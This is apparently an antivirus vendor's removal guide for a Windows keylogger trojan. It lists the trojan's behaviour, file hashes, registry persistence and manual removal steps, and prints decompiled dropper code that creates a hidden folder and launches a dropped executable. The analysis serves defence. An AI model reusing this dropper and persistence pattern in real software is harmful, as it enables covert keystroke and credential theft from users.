Win32.Keylogger.Bv0@a0Lkr4fG-How to Remove?

Win32.Keylogger.Bv0@a0Lkr4fG is a serious Trojan horse virus that infect Windows-based operating system computer. It is used by hackers or cyber criminals to obtain confidential data from the compromised computer. The login details, including user names, passwords, credit card numbers, PINs, etc will be collected and encrypted for illegal purpose.


Analysis date: 15th, July, 2013

Risk Impact/Damage: High


Behavior and damage of Win32.Keylogger.Bv0@a0Lkr4fG:

• Records each keystroke a user types on the compromised computer’s keyboard.

• Takes screenshot to capture graphics-based information

• Monitors online activity and records the visited websites

• Records login names, credit card numbers and bank account data

• Copies instant messengers

• Encrypt all information collected and send to remote control.


Behavior analysis: 


FileName: Keylogger.exe

CRC32: 069E94BF

MD5: 56263331B8A63334C467B43538E5873C

SHA-1: 74479FDE18AD3CD31E84F3DAF5555FE9EFEFB9D9

SHA-256: DE43D0CF867C8F44B6EA435FA07B1AF7DB8060418DFA8B3242070DB3DF2D954D



In Windows operating system based computer, check if debugsrv.exe file exit. If find any, please terminate the process via “OpenProcess,TerminateProcess”


int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)


  char File; // [sp+8h] [bp-2098h]@1

  struct _STARTUPINFOA StartupInfo; // [sp+1008h] [bp-1098h]@1

  struct _PROCESS_INFORMATION ProcessInformation; // [sp+1050h] [bp-1050h]@1

  const CHAR Directory; // [sp+1060h] [bp-1040h]@1

  CHAR CommandLine; // [sp+1098h] [bp-1008h]@1

  unsigned int v10; // [sp+209Ch] [bp-4h]@1

  int v11; // [sp+20A0h] [bp+0h]@1

  v10 = (unsigned int)&v11 ^ __security_cookie;


  memcpy((void *)&Directory, “C:\\WINDOWS\\r_GUID[F481B223-3705-45B3-B9AB-C0D9A3FDEBB4]”, 0x38u);// Create Folder directory

  CreateDirectoryA(&Directory, 0);

  SetFileAttributesA(&Directory, 2u);           // Set “Hide” properties

  sprintf(&File, “%s\\debugsrv.exe”, &Directory);// Assembly path

  sub_401000(0x65u, &File);

  ShellExecuteA(0, “open”, &File, 0, &Directory, 1);// Execute target program

  memset(&StartupInfo, 0, 0x44u);

  StartupInfo.cb = 68;

  ProcessInformation.hProcess = 0;

  ProcessInformation.hThread = 0;

  ProcessInformation.dwProcessId = 0;

  ProcessInformation.dwThreadId = 0;

  sub_401090(&CommandLine, (int)”\\”);// Get its path, after assembling, to create the process.

  CreateProcessA(0, &CommandLine, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);

  WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFFu);

  CloseHandle(ProcessInformation.hProcess);     // Shut down the target process

  CloseHandle(ProcessInformation.hThread);      // close Handle

  return 0;


FileName: debugsrv.exe


MD5: 6365AFC1951A248831443BB448E0FB02


SHA-256: CD6F67C107D6DC2517E949C1102DC524DB90B2F3F40925C72BF0EA5DE6E9C3D2

debugsrv.exe create an event objectMSCDBGSV1,create mutex.

Create and add startup entry


Get backdoor uploading address

Record System information

Save file recording location, and check all information marks.

Encryt recored debugsrv.exe_bug.log about the key-stroke via +0Ah technique.

Win32.Keylogger.Bv0@a0Lkr4fG Removal:


Automatically Removal Tool: Anvi Smart Defender

If you get infected with Win32.Keylogger.Bv0@a0Lkr4fG, we recommend that you run a full system scan. Alternatively, you can try manual method available below.


1. Search and find following folder, and then delete it. (The C:\ should be the default location for the Program Files folder. )


2. Click on Start menu-> Click Run, then type “regedit” and edit following registry entries.

Locate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 and delete MSWDebugServer

We Anvisoft are devoted to develop most practical software and many other useful free tools to protect PC security as well as optimize computer for fast performance. Should you have any problem, please post your issue here. We will answer your question as soon as possible. Thank you for your support to Anvisoft.

Comments are closed.